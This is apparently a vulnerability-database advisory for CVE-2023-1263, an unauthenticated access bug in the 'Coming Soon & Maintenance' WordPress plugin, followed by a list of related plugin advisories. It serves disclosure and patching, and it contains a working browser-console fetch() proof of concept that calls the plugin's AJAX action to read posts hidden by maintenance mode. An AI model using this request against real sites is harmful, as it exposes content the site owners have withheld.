Coming Soon & Maintenance < 4.1.7 – Unauthenticated Post/Page Access in Maintenance Mode | CVE 2023-1263 | Plugin Vulnerabilities

Description

The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as unauthenticated, when maintenance mode is enabled

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=cmp_get_post_detail&id=42',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

cmp-coming-soon-maintenance

Fixed in 4.1.7

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Marco Wotschka

Verified

Yes

WPVDB ID

2e07ffd9-8e82-4078-96aa-162ef78c417b

Timeline

Publicly Published

2023-03-07 (about 2 years ago)

Added

2023-03-08 (about 2 years ago)

Last Updated

2023-03-08 (about 2 years ago)

Other

Published

Title

Published

2025-05-07

Title

Simple File List < 6.1.14 - Missing Authorization to Unauthenticated Minor Settings Update

Published

2025-07-03

Title

WP Human Resource Management 2.0.0 - 2.2.17 - Missing Authorization to Authenticated (Employee+) Privilege Escalation via wp_ajax_hrm_insert_employee AJAX Action

Published

2025-04-04

Title

CRM WordPress Plugin – RepairBuddy < 3.8214 - Missing Authorization

Published

2024-04-17

Title

WPC Frequently Bought Together for WooCommerce < 7.0.4 - Missing Authorization

Published

2026-01-13

Title

WP-CRM System – Manage Clients and Projects <= 3.4.5 - Missing Authorization to Authenticated (Subscriber+) CRM Data Exposure and Task Modification